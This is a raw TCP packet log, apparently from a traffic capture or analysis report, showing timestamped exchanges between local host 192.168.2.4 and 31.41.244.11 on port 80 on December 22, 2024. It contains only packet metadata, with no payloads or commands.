Dec 22, 2024 02:16:15.717766047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.718416929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.718462944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.718566895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.718584061 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.718612909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.718628883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.719300032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.719348907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.719475031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.719491959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.719521046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.719536066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.720316887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.720360994 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.720487118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.720532894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.720614910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.720633030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.720659018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.720674992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.721389055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.721460104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.721493006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.721508980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.721537113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.721550941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.722249985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.722296000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.722373962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.722389936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.722420931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.722435951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.723145962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.723193884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.723238945 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.723256111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.723284960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.723309040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.724056959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.724102020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.724189043 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.724205971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.724234104 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.724245071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.724927902 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.724975109 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.725074053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.725090981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.725121021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.725121021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.725805044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.725851059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.725918055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.725934029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.725959063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.725975037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.726708889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.726758003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.726845980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.726862907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.726891041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.726907015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.727581024 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.727627039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.727724075 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.727766991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.733464003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.733536005 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.733542919 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.733556032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.733577013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.733594894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.733656883 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.733702898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.733922958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.733964920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.733971119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.733999014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.734556913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.734602928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891323090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.891371012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.891386032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891387939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.891415119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891432047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891654968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.891729116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891743898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891769886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.891788006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.891819000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.891833067 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.892513037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.892574072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.892638922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.892657042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.892684937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.892704964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.893435001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.893482924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.893513918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.893532038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.893562078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.893580914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.894313097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.894361973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.894428015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.894444942 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.894478083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.894623041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.895226002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.895276070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.895306110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.895333052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.895364046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.895415068 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.896121025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.896169901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.896182060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.896199942 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.896224976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.896256924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.896970034 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.897018909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.897058964 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.897075891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.897104979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.897121906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.897875071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.897926092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.897944927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.897963047 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.897989988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.898004055 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.898762941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.898813009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.898845911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.898864031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.898890018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.898905993 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.899631023 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.899677038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.899723053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.899740934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.899771929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.899785995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.900546074 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.900595903 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.900625944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.900644064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.900670052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.900685072 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.901453972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.901504993 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.901508093 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.901524067 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.901549101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.901562929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.902319908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.902367115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.902400017 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.902415991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.902446032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.902462006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.903168917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.903218985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.903321981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.903337955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.903367996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.903383970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.904097080 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.904148102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.904172897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.904189110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.904216051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.904230118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.904943943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.904990911 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.905028105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.905044079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.905071020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.905085087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.905833006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.905878067 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.905931950 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.905946970 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.905972958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.905988932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.906766891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.906811953 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.906851053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.906867027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.906893015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.906910896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.907623053 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.907670021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.907727957 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.907742977 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.907778025 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.907830954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.908498049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.908552885 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.908603907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.908618927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.908651114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.908674002 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.909425020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.909473896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.909483910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.909501076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.909523964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.909542084 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.910309076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.910357952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.910386086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.910402060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.910430908 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.910444975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.911206007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.911256075 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.911281109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.911298037 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.911335945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.911350012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.912230968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.912282944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.912328959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.912374973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.912473917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.912491083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.912519932 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.912534952 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.913281918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.913328886 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.913336992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.913353920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.913379908 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.913394928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.914134026 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.914186001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.914222956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.914238930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.914263964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.914278030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.915024042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.915080070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.915101051 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.915117979 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.915143967 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.915157080 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.915908098 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.915951014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.915990114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.916006088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.916035891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.916058064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.916805029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.916852951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.916903019 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.916918993 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.916945934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.916960955 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.917694092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.917738914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.917798996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.917815924 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.917855978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.918554068 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.918601036 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.918653011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.918669939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.918699026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.918714046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.919457912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.919507980 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.919545889 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.919564009 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.919595957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.919612885 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.925535917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.925614119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.925679922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.925698042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.925726891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.925743103 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.925901890 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.925946951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.925959110 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.925976992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.926007032 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.926023960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:15.926733971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:15.926780939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085208893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085259914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085288048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085299969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085299969 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085340023 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085350990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085382938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085468054 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085517883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085596085 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085632086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.085648060 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.085675001 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.086661100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.086709976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.086716890 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.086751938 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.086751938 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.086800098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.087519884 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.087572098 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.087573051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.087611914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.087619066 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.087656021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.088155985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.088207960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.088265896 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.088301897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.088310003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.088346004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.089061975 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.089118004 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.089119911 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.089157104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.089164972 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.089220047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.089927912 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.089983940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.090034962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.090070963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.090085030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.090116978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.090843916 CET	80	49765	31.41.244.11	192.168.2.4
